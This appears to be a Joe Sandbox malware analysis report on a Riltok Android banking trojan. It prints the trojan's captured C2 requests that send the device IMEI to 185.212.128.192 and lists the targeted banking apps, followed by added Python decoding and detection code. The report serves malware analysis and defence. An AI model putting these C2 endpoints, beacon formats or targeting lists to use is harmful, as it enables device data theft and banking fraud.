

Analysis Report wBBPLjgyoW

Overview

General Information

Joe Sandbox Version: 26.0.0
Analysis ID: 894435
Start date: 25.06.2019
Start time: 16:39:36
Joe Sandbox Product: Cloud
Overall analysis duration: 0h 7m 42s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: wBBPLjgyoW
Cookbook file name: defaultandroidfilecookbook.jbs
Analysis system description: Android 7.1 Nougat
APK Instrumentation enabled: true
Detection: MAL
Classification: mal88.troj.spyw.evad.and@0/251@0/0
Warnings:
  • Excluded IPs from analysis (whitelisted): 216.58.208.35, 172.217.16.164, 216.58.208.42, 172.217.16.138, 172.217.22.106, 216.58.210.10, 172.217.18.106, 172.217.23.170, 216.58.205.234, 172.217.18.10, 172.217.18.170, 172.217.23.138, 172.217.16.142, 172.217.22.46, 172.217.22.78, 172.217.22.110, 216.58.210.14, 172.217.16.206, 172.217.18.110, 216.58.205.238, 172.217.22.14, 172.217.18.14, 172.217.18.174, 172.217.23.142, 216.58.206.14, 216.58.207.46, 172.217.16.174, 216.58.208.46, 172.217.18.163
  • Excluded domains from analysis (whitelisted): connectivitycheck.gstatic.com, android.clients.google.com, android.l.google.com, google.com, www.google.com, www.googleapis.com, googleapis.l.google.com
  • No interacted views
  • Not all executed log events are in report (maximum 10 identical API calls)
  • Not all non-executed APIs are in report
  • Report size exceeded maximum capacity; some dynamic data may be missing from the report.

Detection

Strategy: Threshold
Score: 88
Range: 0 - 100
Reporting: Report FP / FN
Whitelisted: false
Detection: malicious

Confidence

Strategy: Threshold
Score: 5
Range: 0 - 5
Further Analysis Required?: false


Classification

Analysis Advice

Some HTTP requests failed (404). It is likely the sample will exhibit less behavior than it would with a live C2.



Mitre Att&ck Matrix

Signature Overview



Privilege Escalation:

Checks if the device administrator is active
Source: com.aviasalea.checkui.AdRequestDialog;->setAdmin:5 | API Call: android.app.admin.DevicePolicyManager.isAdminActive
Source: com.aviasalea.srs.GPSrs;->hasAd:42 | API Call: android.app.admin.DevicePolicyManager.isAdminActive
Tries to add a new device administrator
Source: com.aviasalea.checktls.IntTls;->startoAdminAction:120 | API Call: android.content.Intent.<init> android.app.action.ADD_DEVICE_ADMIN
Source: Lcom/aviasalea/checktls/IntTls;->startoAdminAction(Landroid/content/ComponentName;Landroid/app/Activity;)V | Method string: "android.app.action.ADD_DEVICE_ADMIN"

Spreading:

Has permission to change the WIFI configuration including connecting and disconnecting
Source: submitted apk | Request permission: android.permission.CHANGE_WIFI_STATE

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2022986 ET TROJAN Likely Zbot Generic Request to gate.php Dotted-Quad 192.168.1.92:39042 -> 185.212.128.192:80
Source: Traffic | Snort IDS: 2022986 ET TROJAN Likely Zbot Generic Request to gate.php Dotted-Quad 192.168.1.92:39048 -> 185.212.128.192:80
Source: Traffic | Snort IDS: 2022986 ET TROJAN Likely Zbot Generic Request to gate.php Dotted-Quad 192.168.1.92:39054 -> 185.212.128.192:80
Source: Traffic | Snort IDS: 2022986 ET TROJAN Likely Zbot Generic Request to gate.php Dotted-Quad 192.168.1.92:39058 -> 185.212.128.192:80
Source: Traffic | Snort IDS: 2022986 ET TROJAN Likely Zbot Generic Request to gate.php Dotted-Quad 192.168.1.92:39060 -> 185.212.128.192:80
Source: Traffic | Snort IDS: 2022986 ET TROJAN Likely Zbot Generic Request to gate.php Dotted-Quad 192.168.1.92:39062 -> 185.212.128.192:80
Note: this ET rule fires on the generic shape of a gate.php request to a dotted-quad host; "Zbot" is the rule's label, not a family attribution. The static signatures in the E-Banking Fraud section identify the sample as Riltok.
Tries to download files via HTTP but all files are no longer available
Source: HTTP Header | HTTP: all HTTP requests resulted in 404 Not Found
Uses the command line tool ping to scan for other devices in the same network
Source: com.aviasalea.ping.PingNative;->ping:50 | API Call: java.lang.Runtime.exec ping -c 1 -w 1 172.217.16.174 (6 identical calls)
Note: the only ping target observed is 172.217.16.174, a Google address that also appears in the excluded-IP list above; together with the getByName("google.com") lookup in this section, this reads as an internet connectivity check rather than LAN discovery.
Checks an internet connection is available
Source: com.aviasalea.checktls.CmndTls;->isInternetConnected:150 | API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.aviasalea.checktls.CmndTls;->isInternetConnected:151 | API Call: android.net.NetworkInfo.isConnectedOrConnecting
Source: com.aviasalea.checktls.WFTls;->onWifi:20 | API Call: android.net.wifi.WifiManager.isWifiEnabled
Connects to IPs without corresponding DNS lookups
Source: unknown | TCP traffic detected without corresponding DNS query: 74.125.140.188 (21 events)
Source: unknown | TCP traffic detected without corresponding DNS query: 185.212.128.192 (29 events)
Enables or disables WIFI
Source: com.aviasalea.checktls.WFTls;->onWifi:21 | API Call: android.net.wifi.WifiManager.setWifiEnabled
Source: com.aviasalea.checktls.WFTls;->onWifi:25 | API Call: android.net.wifi.WifiManager.setWifiEnabled
Opens an internet connection
Source: com.aviasalea.api.request.HTTPConnection;-><init>:3 | API Call: java.net.URL.openConnection("http://185.212.128.192/1324273/gate.php?ID=450785365059857103&screen=on")
Source: com.aviasalea.api.request.HTTPConnection;-><init>:3 | API Call: java.net.URL.openConnection("http://185.212.128.192/1324273/report.php")
Performs DNS lookups (Java API)
Source: com.aviasalea.ping.Ping;->onAddress:4 | API Call: java.net.InetAddress.getByName (URL: "google.com")
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected (issued from a WebView: note the "wv" token in the User-Agent and the X-Requested-With header carrying the package name):
  GET /1324273/bee/avia/index1.php?ID=450785365059857103 HTTP/1.1
  Host: 185.212.128.192
  Connection: keep-alive
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Linux; Android 7.1.2; VirtualBox Build/N2G48H; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/52.0.2743.100 Mobile Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Encoding: gzip, deflate
  Accept-Language: en-US
  X-Requested-With: com.aviasalea
Source: global traffic | HTTP traffic detected:
  GET /favicon.ico HTTP/1.1
  Host: 185.212.128.192
  Connection: keep-alive
  User-Agent: Mozilla/5.0 (Linux; Android 7.1.2; VirtualBox Build/N2G48H; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/52.0.2743.100 Mobile Safari/537.36
  Accept: */*
  Referer: http://185.212.128.192/1324273/bee/avia/index1.php?ID=450785365059857103
  Accept-Encoding: gzip, deflate
  Accept-Language: en-US
  X-Requested-With: com.aviasalea
Source: global traffic | HTTP traffic detected (6 identical requests; sent by the plain Dalvik HTTP client, not a WebView):
  GET /1324273/gate.php?ID=450785365059857103&screen=on HTTP/1.1
  Accept-Charset: UTF-8
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1.2; VirtualBox Build/N2G48H)
  Host: 185.212.128.192
  Connection: Keep-Alive
  Accept-Encoding: gzip
Posts data to webserver
Source: unknown | HTTP traffic detected:
  POST /1324273/report.php HTTP/1.1
  Accept-Charset: UTF-8
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 70
  User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1.2; VirtualBox Build/N2G48H)
  Host: 185.212.128.192
  Connection: Keep-Alive
  Accept-Encoding: gzip
  Data Raw: 31 3d 25 37 42 25 32 32 72 65 70 6f 72 74 25 32 32 25 33 41 25 32 32 73 6d 73 25 32 32 25 32 43 25 32 32 69 64 25 32 32 25 33 41 25 32 32 34 35 30 37 38 35 33 36 35 30 35 39 38 35 37 31 30 33 25 32 32 25 37 44
  Data Ascii: 1=%7B%22report%22%3A%22sms%22%2C%22id%22%3A%22450785365059857103%22%7D
  (form field "1", URL-decoded: {"report":"sms","id":"450785365059857103"})
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Tue, 25 Jun 2019 14:41:13 GMT
  Server: Apache/2.4.10 (Debian)
  Content-Length: 306
  Keep-Alive: timeout=5, max=100
  Connection: Keep-Alive
  Content-Type: text/html; charset=iso-8859-1
  Data Raw (dump truncated in the report): 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 31 33 32 34 32 37 33 2f 62 65 65 2f 61 76 69 61 2f 69 6e 64 65 78 31 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 38 35 2e 32 31 32 2e 31 32
  Data Ascii (decoded from the truncated dump): <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /1324273/bee/avia/index1.php was not found on this server.</p> <hr> <address>Apache/2.4.10 (Debian) Server at 185.212.12
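
Added worked example (not part of the Joe Sandbox report): the Python below decodes the raw POST body captured above and the gate.php query string, so the beacon contents can be read without the sandbox. The hex bytes, the URL and the flagged device ID are copied from this report; the form-field and JSON layout is simply what the bytes decode to, and the substring check at the end is an analyst heuristic, not the sandbox's own method.

```python
import json
from urllib.parse import parse_qs, urlsplit

# Raw body of POST /1324273/report.php as captured by the sandbox
# (hex copied verbatim from the report; Content-Length was 70).
REPORT_BODY_HEX = (
    "31 3d 25 37 42 25 32 32 72 65 70 6f 72 74 25 32 32 25 33 41 25 32 32 73 6d 73 "
    "25 32 32 25 32 43 25 32 32 69 64 25 32 32 25 33 41 25 32 32 34 35 30 37 38 35 "
    "33 36 35 30 35 39 38 35 37 31 30 33 25 32 32 25 37 44"
)

# Beacon URL and the value the sandbox flagged as TelephonyManager.getDeviceId,
# both copied from the report.
GATE_URL = "http://185.212.128.192/1324273/gate.php?ID=450785365059857103&screen=on"
LEAKED_DEVICE_ID = "450785365059857"


def decode_report_body(hex_dump: str) -> dict:
    """Turn the sandbox's space-separated hex dump into the JSON object the bot
    posts. The body is one form field named "1" whose value is a percent-encoded
    JSON document; parse_qs undoes the percent-encoding for us."""
    raw = bytes.fromhex(hex_dump.replace(" ", ""))
    form = parse_qs(raw.decode("ascii"), strict_parsing=True)
    return json.loads(form["1"][0])


def gate_params(url: str) -> dict:
    """Flatten the gate.php query string to single string values."""
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}


def device_id_leak(params: dict, device_id: str) -> list:
    """Names of the query parameters that embed the device identifier.
    Substring match, because in this report the ID parameter is the
    15-digit device ID followed by three more digits."""
    return [k for k, v in params.items() if device_id in v]


if __name__ == "__main__":
    report = decode_report_body(REPORT_BODY_HEX)
    print("report.php body:", report)
    params = gate_params(GATE_URL)
    print("gate.php params:", params)
    print("parameters carrying the device ID:", device_id_leak(params, LEAKED_DEVICE_ID))
```

The decoded report body is `{"report": "sms", "id": "450785365059857103"}`, i.e. an acknowledgement that an SMS-related task was carried out, keyed by the same bot ID the gate.php beacon sends; the `screen=on` parameter is the only other state the beacon reports in this capture.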
Urls found in memory or binary data
Source: librealtalk-jni.so | String found in binary or memory: http://185.212.128.192/1324273/
Source: android | String found in binary or memory: http://185.212.128.192/1324273/bee/alfa/index.php
Source: librealtalk-jni.so | String found in binary or memory: http://185.212.128.192/1324273/bee/avia/index1.php
Source: android | String found in binary or memory: http://185.212.128.192/1324273/bee/avia/index1.php?ID=450785365059857103
Source: librealtalk-jni.so | String found in binary or memory: http://185.212.128.192/1324273/bee/avia/index1.phpru.berbankmobilecom.android.settings.DeviceAdminAd
Source: android | String found in binary or memory: http://185.212.128.192/1324273/bee/homecredit/index.php
Source: android | String found in binary or memory: http://185.212.128.192/1324273/bee/open/index.php
Source: android | String found in binary or memory: http://185.212.128.192/1324273/bee/rus/index.php
Source: android | String found in binary or memory: http://185.212.128.192/1324273/bee/tin/index.php
Source: android | String found in binary or memory: http://185.212.128.192/1324273/bee/vtb.php
Source: android | String found in binary or memory: http://185.212.128.192/1324273/gate.php
Source: android | String found in binary or memory: http://185.212.128.192/1324273/gate.php?ID=450785365059857103&screen=on
Source: librealtalk-jni.so | String found in binary or memory: http://185.212.128.192/1324273/http://le22999a.pw/1324273/start_accessdisable_sdef_sms_cl_packagepsu
Source: android | String found in binary or memory: http://185.212.128.192/1324273/report.php
Source: librealtalk-jni.so | String found in binary or memory: http://le22999a.pw/1324273/
Source: sber_login.xml | String found in binary or memory: http://schemas.android.com/apk/res-auto
Source: notification_template_icon_group.xml, service_conf.xml, payment_ic_visa.xml, ntivu.xml, notification_media_action.xml, keyboard_view.xml, notification_template_part_time.xml, payment_ic_amex.xml, AndroidManifest.xml | String found in binary or memory: http://schemas.android.com/apk/res/android
Note: the two librealtalk-jni.so entries that run several strings together appear to be adjacent entries from the library's string table; le22999a.pw is a second base URL sharing the /1324273/ path with the hard-coded IP, and the /bee/<bank>/ pages match the banking package list in the next section.

E-Banking Fraud:

Detected Riltok e-Banking Malware
Source: Lcom/aviasalea/checktls/MsTls;->sendFullSMS(Landroid/content/Context;ILjava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)Z | Method string: Riltok specific strings
Found large list of e-Banking application (likely related to e-Banking fraud)
Source: Lcom/aviasalea/wb/WITools$Inj;->setApps(Lorg/json/JSONArray;)V | Method string: com.idamob.tinkoff.android
Source: Lcom/aviasalea/wb/WITools$Inj;->setApps(Lorg/json/JSONArray;)V | Method string: com.idamobile.android.hcb
Source: Lcom/aviasalea/wb/WITools$Inj;->setApps(Lorg/json/JSONArray;)V | Method string: com.legionlabs.p2p.open
Source: Lcom/aviasalea/wb/WITools$Inj;->setApps(Lorg/json/JSONArray;)V | Method string: com.openbank
Source: Lcom/aviasalea/wb/WITools$Inj;->setApps(Lorg/json/JSONArray;)V | Method string: com.vtb.mobilebank
Source: Lcom/aviasalea/wb/WITools$Inj;->setApps(Lorg/json/JSONArray;)V | Method string: ru.alfabank.mobile.android
Source: Lcom/aviasalea/wb/WITools$Inj;->setApps(Lorg/json/JSONArray;)V | Method string: ru.alfabank.oavdo.amc
Source: Lcom/aviasalea/wb/WITools$Inj;->setApps(Lorg/json/JSONArray;)V | Method string: ru.homecredit.mycredit
Source: Lcom/aviasalea/wb/WITools$Inj;->setApps(Lorg/json/JSONArray;)V | Method string: ru.m4bank.rsb.alipay
Source: Lcom/aviasalea/wb/WITools$Inj;->setApps(Lorg/json/JSONArray;)V | Method string: ru.open.android.konsierge24
Source: Lcom/aviasalea/wb/WITools$Inj;->setApps(Lorg/json/JSONArray;)V | Method string: ru.rsb.prepaid
Source: Lcom/aviasalea/wb/WITools$Inj;->setApps(Lorg/json/JSONArray;)V | Method string: ru.simpls.brs2.mobbank
Source: Lcom/aviasalea/wb/WITools$Inj;->setApps(Lorg/json/JSONArray;)V | Method string: ru.tinkoff.sme
Source: Lcom/aviasalea/wb/WITools$Inj;->setApps(Lorg/json/JSONArray;)V | Method string: ru.vt24.mobilebanking.android
Contains package name strings related to banking (usually for identifying banking APKs)
Source: Lcom/aviasalea/wb/WITools$Inj;->setApps(Lorg/json/JSONArray;)V | Method String: com.vtb.mobilebank, ru.alfabank.mobile.android, ru.alfabank.oavdo.amc, ru.m4bank.rsb.alipay, ru.m4bank.rsb, ru.simpls.brs2.mobbank, ru.vt24.mobilebanking.android
Has permission to query the list of currently running applications
Source: submitted apk | Request permission: android.permission.GET_TASKS
May query for the most recent running application (usually for UI overlaying)
Source: com.aviasalea.checktls.PkgTls;->getActivityBeforeLolipop | getRunningTasks and getPackageName invocations in same method: com.aviasalea.checktls.PkgTls;->getActivityBeforeLolipop:9, com.aviasalea.checktls.PkgTls;->getActivityBeforeLolipop:12 (reported twice)

Spam, unwanted Advertisements and Ransom Demands:

Dials phone numbers
Source: com.aviasalea.checktls.IntTls;->callNumber:17 | API Call: android.content.Context.startActivity
Has permission to perform phone calls in the background
Source: submitted apk | Request permission: android.permission.CALL_PHONE
Has permission to send SMS in the background
Source: submitted apk | Request permission: android.permission.SEND_SMS
Sends SMS using SmsManager
Source: com.aviasalea.checktls.CmndTls;->sendSMS:199 | API Call: android.telephony.SmsManager.sendTextMessage
Source: com.aviasalea.checktls.MsTls;->sendFullSMS:85 | API Call: android.telephony.SmsManager.sendTextMessage
Source: com.aviasalea.checktls.MsTls;->sendFullSMS:99 | API Call: android.telephony.SmsManager.sendTextMessage

Change of System Appearance:

Sets a repeating alarm
Source: com.aviasalea.srs.GPSrs;->scheduleSSRec:68 | API Call: android.app.AlarmManager.setRepeating

System Summary:

Executes native commands
Source: com.aviasalea.ping.PingNative;->ping:50 | API Call: java.lang.Runtime.exec ("ping -c 1 -w 1 172.217.16.174") (6 identical calls)
Source: com.aviasalea.checktls.CmndTls;->canExecuteCommand:4 | API Call: java.lang.Runtime.exec
Requests potentially dangerous permissions
Source: submitted apk | Request permission: android.permission.CALL_PHONE
Source: submitted apk | Request permission: android.permission.CHANGE_NETWORK_STATE
Source: submitted apk | Request permission: android.permission.CHANGE_WIFI_STATE
Source: submitted apk | Request permission: android.permission.GET_TASKS
Source: submitted apk | Request permission: android.permission.INTERNET
Source: submitted apk | Request permission: android.permission.READ_PHONE_STATE
Source: submitted apk | Request permission: android.permission.READ_SMS
Source: submitted apk | Request permission: android.permission.RECEIVE_SMS
Source: submitted apk | Request permission: android.permission.SEND_SMS
Source: submitted apk | Request permission: android.permission.SYSTEM_ALERT_WINDOW
Source: submitted apk | Request permission: android.permission.WAKE_LOCK
Source: submitted apk | Request permission: android.permission.WRITE_SETTINGS
Classification label
Source: classification engine | Classification label: mal88.troj.spyw.evad.and@0/251@0/0
Loads native libraries
Source: com.aviasalea.Realtalk;-><clinit>:2 | API Call: java.lang.System.loadLibrary ("realtalk-jni")

Data Obfuscation:

Uses reflection
Source: com.aviasalea.checktls.AndroidUtilities;->setScrollViewEdgeEffectColor:74 | API Call: java.lang.reflect.Field.get
Source: com.aviasalea.checktls.AndroidUtilities;->setScrollViewEdgeEffectColor:79 | API Call: java.lang.reflect.Field.get
Source: com.aviasalea.checktls.CmndTls;->getPsuedoUniqueID:92 | API Call: java.lang.reflect.Field.get
Source: com.aviasalea.checktls.MsTls;->sendFullSMS:13 | API Call: java.lang.reflect.Method.invoke
Source: com.aviasalea.checktls.MsTls;->sendFullSMS:19 | API Call: java.lang.reflect.Method.invoke
Source: com.aviasalea.checktls.MsTls;->sendFullSMS:30 | API Call: java.lang.reflect.Method.invoke
Source: de.greenrobot.event.EventBus;->invokeSubscriber:204 | API Call: java.lang.reflect.Method.invoke

Persistence and Installation Behavior:

Launches other applications
Source: com.aviasalea.checkui.ActOpenApp;->onCreate:13 | API Call: android.content.pm.PackageManager.getLaunchIntentForPackage

Boot Survival:

Has permission to execute code after phone reboot
Source: submitted apk | Request permission: android.permission.RECEIVE_BOOT_COMPLETED

Hooking and other Techniques for Hiding and Protection:

Removes its application launcher (likely to stay hidden)
Source: com.aviasalea.MainActivity;->hideApp:11 | API Call: android.content.pm.PackageManager.setComponentEnabledSetting
Source: com.aviasalea.srs.CmndSrs;->hideApp:43 | API Call: android.content.pm.PackageManager.setComponentEnabledSetting
Aborts a broadcast event (this is often done to hide phone events such as incoming SMS)
Source: com.aviasalea.mess.service.receiver.SmsReceiver;->smsReceived:13 | API Call: android.content.BroadcastReceiver.abortBroadcast
Has permission to draw over other applications or user interfaces
Source: submitted apk | Request permission: android.permission.SYSTEM_ALERT_WINDOW
Has permission to query the list of currently running applications
Source: submitted apk | Request permission: android.permission.GET_TASKS
Queries list of running processes/tasks
Source: com.aviasalea.checktls.CmndTls;->isInServiceProcess:135 | API Call: android.app.ActivityManager.getRunningAppProcesses
Source: com.aviasalea.checktls.CmndTls;->isMyActivityRunning:155 | API Call: android.app.ActivityManager.getRunningAppProcesses
Source: com.aviasalea.checktls.PkgTls;->getActivityAfterLolipop:6 | API Call: android.app.ActivityManager.getRunningAppProcesses
Source: com.aviasalea.checktls.PkgTls;->getActivityBeforeLolipop:9 | API Call: android.app.ActivityManager.getRunningTasks

Malware Analysis System Evasion:

Accesses android OS build fields
Source: com.aviasalea.checktls.CmndTls;->getDeviceName:33 | Field Access: android.os.Build.MANUFACTURER
Source: com.aviasalea.checktls.CmndTls;->getDeviceName:34 | Field Access: android.os.Build.MODEL
Source: com.aviasalea.checktls.CmndTls;->getPsuedoUniqueID:68 | Field Access: android.os.Build.BOARD
Source: com.aviasalea.checktls.CmndTls;->getPsuedoUniqueID:71 | Field Access: android.os.Build.BRAND
Source: com.aviasalea.checktls.CmndTls;->getPsuedoUniqueID:74 | Field Access: android.os.Build.CPU_ABI
Source: com.aviasalea.checktls.CmndTls;->getPsuedoUniqueID:77 | Field Access: android.os.Build.DEVICE
Source: com.aviasalea.checktls.CmndTls;->getPsuedoUniqueID:80 | Field Access: android.os.Build.MANUFACTURER
Source: com.aviasalea.checktls.CmndTls;->getPsuedoUniqueID:83 | Field Access: android.os.Build.MODEL
Source: com.aviasalea.checktls.CmndTls;->getPsuedoUniqueID:86 | Field Access: android.os.Build.PRODUCT
Source: com.aviasalea.checktls.CmndTls;->isRooted:172 | Field Access: android.os.Build.TAGS
Source: com.aviasalea.checktls.MsTls;->sendFullSMS:4 | Field Access: android.os.Build.MODEL
Queries several pieces of sensitive phone information
Source: Lcom/aviasalea/wb/WITools;->changeWEBInjJSONbyPkg(Ljava/lang/String;)Ljava/lang/String; | Method string: "type"
Source: Lcom/aviasalea/srs/api/requests/RegistrationReportStep2Request;->getHttpParams(Landroid/content/Context;)Ljava/lang/String; | Method string: "version"
Source: Lcom/aviasalea/checktls/CmndTls;->getPhoneOperator(Landroid/content/Context;)Ljava/lang/String; | Method string: "phone"
Source: Lcom/aviasalea/srs/api/requests/RegistrationReportStep2Request;->getHttpParams(Landroid/content/Context;)Ljava/lang/String; | Method string: "imei"
Source: Lcom/aviasalea/srs/api/requests/RegistrationReportStep2Request;->getHttpParams(Landroid/content/Context;)Ljava/lang/String; | Method string: "model"
Queries the unique operating system id (ANDROID_ID)
Source: com.aviasalea.checktls.CmndTls;->getPhoneIMEINumber:50 | API Call: android.provider.Settings$Secure.getString

Language, Device and Operating System Detection:

Checks if phone is rooted (checks for Superuser.apk)
Source: com.aviasalea.checktls.CmndTls;->isRooted:176 | API Call: java.io.File.<init>("/system/app/Superuser.apk")
Checks if phone is rooted (checks for test-keys build tags)
Source: com.aviasalea.checktls.CmndTls;->isRooted:174 | API Call: java.lang.String.contains("test-keys")
Queries the network operator name
Source: com.aviasalea.checktls.CmndTls;->getPhoneOperator:63 | API Call: android.telephony.TelephonyManager.getNetworkOperatorName
Queries the unique device ID (IMEI, MEID or ESN)
Source: com.aviasalea.checktls.CmndTls;->getPhoneIMEINumber:51 | API Call: android.telephony.TelephonyManager.getDeviceId
Source: com.aviasalea.checktls.CmndTls;->getPhoneNumber:59 | API Call: android.telephony.TelephonyManager.getLine1Number
Source: com.aviasalea.checktls.CmndTls;->getPhoneNumber:60 | API Call: android.telephony.TelephonyManager.getLine1Number

Stealing of Sensitive Information:

Leaking sensitive information via HTTP to a webserver
Source: com.aviasalea.api.request.HTTPConnection;-><init>:3 | API Call: java.net.URL.openConnection (URL: "http://185.212.128.192/1324273/gate.php?ID=450785365059857103&screen=on", POST data: "http://185.212.128.192/1324273/gate.php?ID=450785365059857103&screen=on", Leaked: "TelephonyManager.getDeviceId=450785365059857")
Monitors outgoing Phone calls
Source: com.aviasalea.rcs.RestartService | Registered receiver: android.intent.action.NEW_OUTGOING_CALL
Uploads sensitive phone information to the internet (privacy leak)
Source: 192.168.1.92:39040 -> 185.212.128.192:80 | HTTP traffic detected: Header contains sensitive information: 450785365059857 (TelephonyManager.getDeviceId) (2 events)
Source: 192.168.1.92:39042 -> 185.212.128.192:80 | HTTP traffic detected: Header contains sensitive information: 450785365059857 (TelephonyManager.getDeviceId)
Source: 192.168.1.92:39048 -> 185.212.128.192:80 | HTTP traffic detected: Header contains sensitive information: 450785365059857 (TelephonyManager.getDeviceId)
Source: 192.168.1.92:39054 -> 185.212.128.192:80 | HTTP traffic detected: Header contains sensitive information: 450785365059857 (TelephonyManager.getDeviceId)
Source: 192.168.1.92:39056 -> 185.212.128.192:80 | HTTP traffic detected: Header contains sensitive information: 450785365059857 (TelephonyManager.getDeviceId)
Source: 192.168.1.92:39058 -> 185.212.128.192:80 | HTTP traffic detected: Header contains sensitive information: 450785365059857 (TelephonyManager.getDeviceId)
Source: 192.168.1.92:39060 -> 185.212.128.192:80 | HTTP traffic detected: Header contains sensitive information: 450785365059857 (TelephonyManager.getDeviceId)
Source: 192.168.1.92:39062 -> 185.212.128.192:80 | HTTP traffic detected: Header contains sensitive information: 450785365059857 (TelephonyManager.getDeviceId)
Source: 192.168.1.92:39066 -> 185.212.128.192:80 | HTTP traffic detected: Header contains sensitive information: 450785365059857 (TelephonyManager.getDeviceId)
Note: the leaked device ID 450785365059857 is the first 15 digits of the ID=450785365059857103 value carried, unencrypted over plain HTTP, in every gate.php and index1.php request above; the sandbox flags it because it knows its own emulator IMEI.
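
Added detection example (not from the report or the sandbox): a proxy-log heuristic for the beacon shape documented above, namely a bare IPv4 Host, a gate.php or report.php script, a raw Dalvik user agent instead of a WebView one, and a query parameter that looks like an IMEI. Outside a sandbox the defender does not know the device's IMEI, so the example generalises the sandbox's exact-value match to "15 digits that pass the Luhn check", which the flagged value 450785365059857 does. The log format and every line except the two copied from this report are constructed; the indicator names and the three-of-four threshold are my choices, not anything the page specifies.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed proxy-log lines in the form: METHOD URL "User-Agent".
# The first two reproduce requests from the report; the other two are made up
# for contrast (a WebView browsing request, and an IP-literal host with a
# short non-IMEI id that must not be flagged).
SAMPLE_LOG = """\
GET http://185.212.128.192/1324273/gate.php?ID=450785365059857103&screen=on "Dalvik/2.1.0 (Linux; U; Android 7.1.2; VirtualBox Build/N2G48H)"
POST http://185.212.128.192/1324273/report.php "Dalvik/2.1.0 (Linux; U; Android 7.1.2; VirtualBox Build/N2G48H)"
GET http://www.google.com/search?q=flights "Mozilla/5.0 (Linux; Android 7.1.2; wv) AppleWebKit/537.36 Chrome/52.0.2743.100 Mobile Safari/537.36"
GET http://10.0.0.5/api/status.php?id=42 "Dalvik/2.1.0 (Linux; U; Android 9; Pixel 3)"
"""

LINE_RE = re.compile(r'^(?P<method>[A-Z]+) (?P<url>\S+) "(?P<ua>[^"]*)"$')
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
C2_SCRIPTS = {"gate.php", "report.php"}  # script names seen in this report


def luhn_ok(digits: str) -> bool:
    """Luhn checksum; a 15-digit IMEI carries a Luhn check digit in position 15."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def imei_like(value: str) -> bool:
    """True if any 15-digit window of a digit run in value passes Luhn.
    Heuristic only: about 1 in 10 random 15-digit strings also pass."""
    for run in re.findall(r"\d{15,}", value):
        for i in range(len(run) - 14):
            if luhn_ok(run[i:i + 15]):
                return True
    return False


def indicators(line: str) -> list:
    """Return the names of the indicators that fire on one log line."""
    m = LINE_RE.match(line)
    if not m:
        return []
    url = urlsplit(m["url"])
    hits = []
    if IPV4_RE.match(url.hostname or ""):
        hits.append("ip_literal_host")            # no DNS, as the report notes
    if url.path.rsplit("/", 1)[-1] in C2_SCRIPTS:
        hits.append("known_c2_script")
    if m["ua"].startswith("Dalvik/"):
        hits.append("dalvik_client")              # app HTTP stack, not a WebView
    if any(imei_like(v) for _, v in parse_qsl(url.query)):
        hits.append("imei_like_query_param")
    return hits


def scan(log_text: str, min_hits: int = 3) -> list:
    """(line, indicators) for every line with at least min_hits indicators."""
    flagged = []
    for line in log_text.splitlines():
        hits = indicators(line)
        if len(hits) >= min_hits:
            flagged.append((line, hits))
    return flagged


if __name__ == "__main__":
    for line, hits in scan(SAMPLE_LOG):
        print(hits, line.split(" ", 2)[1])
```

Both report lines are flagged (the gate.php beacon on all four indicators, the report.php POST on three); the WebView browsing line fires nothing and the constructed `10.0.0.5` line stops at two, which is why the threshold sits at three rather than on any single indicator.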
Uses accessibility services (likely to control other applications)
Source: com.aviasalea.checktls.NdTls;->getClickableNode:33 | API Call: android.view.accessibility.AccessibilityNodeInfo.findAccessibilityNodeInfosByText
Source: com.aviasalea.checktls.NdTls;->hasText:47 | API Call: android.view.accessibility.AccessibilityNodeInfo.findAccessibilityNodeInfosByText
Creates SMS message objects from PDU data
Source: com.aviasalea.mess.service.receiver.SmsReceiver;->smsReceived:9 | API Call: android.telephony.SmsManager.createFromPdu
Has permission to read the SMS storage
Source: submitted apk | Request permission: android.permission.READ_SMS
Has permission to read the phone's state (phone number, device IDs, active call, etc.)
